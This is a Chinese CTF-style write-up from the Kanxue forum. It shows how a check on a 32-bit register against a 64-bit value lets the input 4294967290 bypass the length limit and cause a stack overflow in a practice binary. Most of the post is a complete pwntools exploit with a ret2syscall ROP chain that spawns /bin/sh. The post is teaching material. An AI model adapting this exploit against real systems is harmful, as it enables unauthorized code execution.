由寄存器位数差异引发的漏洞利用
2020-02-24 18:58:00 Author: mp.weixin.qq.com(查看原文) 阅读量:90 收藏

本文为看雪论坛优秀文章

看雪论坛作者ID:kabeor 

看到分享了一道练习题,感觉比较有趣(对我这样的新手来说),于是想与大家分享一下思路。
|63..32|31..16|15-8|7-0|               |AH.|AL.|               |AX.....|       |EAX............||RAX...................|

以上是16,32,64位寄存器的大小。
安全检查
Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)

IDA分析
 
可见有一处花指令,先nop掉看逻辑:
 
 
 
要求输入小于等于10也就是0xA,否则程序退出。
 
查看汇编:
 
 
可以发现:
eax               0000 000arax     0000 0000 0000 000arax     0000 0001 0000 000a    构造成这样也可以通过

cmp指令的隐含操作为 op1-op2判断是否等于0。因此可触发类似整数溢出的漏洞。
 
于是如果我们构造 0x1 0000 0009 - 0xa 就会将eax内容变为 0xffff ffff,从而在后面的read name可以读大量字节,造成栈溢出。
 
使用file命令查看发现程序为静态链接:
  ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=c69a6b123774b6c538eb99551edd57bc703c32f9, not stripped

且程序内有syscall,因此直接使用ret2syscall进行ROP。
 
对于这道题来说,即可以手工构造给syscall传参,也可以使用 ROPgadget直接生成利用链:
  ROPgadget --binary intoverflow --ropchain

直接生成如下:
ROP chain generation=========================================================== - Step 1 -- Write-what-where gadgets     [+] Gadget found: 0x47c601 mov qword ptr [rsi], rax ; ret    [+] Gadget found: 0x4017b7 pop rsi ; ret    [+] Gadget found: 0x480956 pop rax ; pop rdx ; pop rbx ; ret    [+] Gadget found: 0x42660f xor rax, rax ; ret - Step 2 -- Init syscall number gadgets     [+] Gadget found: 0x42660f xor rax, rax ; ret    [+] Gadget found: 0x46ea20 add rax, 1 ; ret    [+] Gadget found: 0x46ea21 add eax, 1 ; ret - Step 3 -- Init syscall arguments gadgets     [+] Gadget found: 0x401696 pop rdi ; ret    [+] Gadget found: 0x4017b7 pop rsi ; ret    [+] Gadget found: 0x442e46 pop rdx ; ret - Step 4 -- Syscall gadget     [+] Gadget found: 0x4003da syscall - Step 5 -- Build the ROP chain     #!/usr/bin/env python2    # execve generated by ROPgadget     from struct import pack     # Padding goes here    p = ''     p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret    p += pack('<Q', 0x00000000006ca080) # @ .data    p += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret    p += '/bin//sh'    p += pack('<Q', 0x4141414141414141) # padding    p += pack('<Q', 0x4141414141414141) # padding    p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret    p += pack('<Q', 0x00000000006ca088) # @ .data + 8    p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret    p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret    p += pack('<Q', 0x0000000000401696) # pop rdi ; ret    p += pack('<Q', 0x00000000006ca080) # @ .data    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret    p += pack('<Q', 0x00000000006ca088) # @ .data + 8    p += pack('<Q', 0x0000000000442e46) # pop rdx ; ret    p += pack('<Q', 0x00000000006ca088) # @ .data + 8    p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret    p += pack('<Q', 0x00000000004003da) # syscall

于是利用思路如下:
1. 输入构造的数字使read参数极大
2. 填充到retn位置
3. 填充rop利用链

exp

from pwn import *from struct import packp=process('./intoverflow') payload='a'*88payload += pack('<Q', 0x00000000004017b7) # pop rsi ; retpayload += pack('<Q', 0x00000000006ca080) # @ .datapayload += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; retpayload += '/bin//sh'payload += pack('<Q', 0x4141414141414141) # paddingpayload += pack('<Q', 0x4141414141414141) # paddingpayload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; retpayload += pack('<Q', 0x00000000004017b7) # pop rsi ; retpayload += pack('<Q', 0x00000000006ca088) # @ .data + 8payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; retpayload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; retpayload += pack('<Q', 0x0000000000401696) # pop rdi ; retpayload += pack('<Q', 0x00000000006ca080) # @ .datapayload += pack('<Q', 0x00000000004017b7) # pop rsi ; retpayload += pack('<Q', 0x00000000006ca088) # @ .data + 8payload += pack('<Q', 0x0000000000442e46) # pop rdx ; retpayload += pack('<Q', 0x00000000006ca088) # @ .data + 8payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x000000000046ea20) # add rax, 1 ; retpayload += pack('<Q', 0x00000000004003da) # syscall p.recvuntil('Plz Input Your weight(kg):\n> ')p.sendline('4294967290')p.recvuntil('Good! what\'s your name??\n> ')p.sendline(payload) p.interactive()
- End -

看雪ID:kabeor

https://bbs.pediy.com/user-787320.htm 

*本文由看雪论坛 kabeor 原创,转载请注明来自看雪社区。

推荐文章++++

CVE-2017-11882理论以及实战样本分析

恶意代码分析之 RC4 算法学习

CVE-2017-0101-Win32k提权分析笔记

ROPEmporium全解

实战栈溢出漏洞

好书推荐


公众号ID:ikanxue
官方微博:看雪安全
商务合作:[email protected]
“阅读原文”一起来充电吧!

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&amp;mid=2458303650&amp;idx=1&amp;sn=6330f6a918f9aef549db85e9105a7e63&amp;chksm=b1818c2886f6053e53558fc62fc4ef321fd163d682d6e02d87773ff0edd2cda1e0c57777fe76#rd
如有侵权请联系:admin#unsafe.sh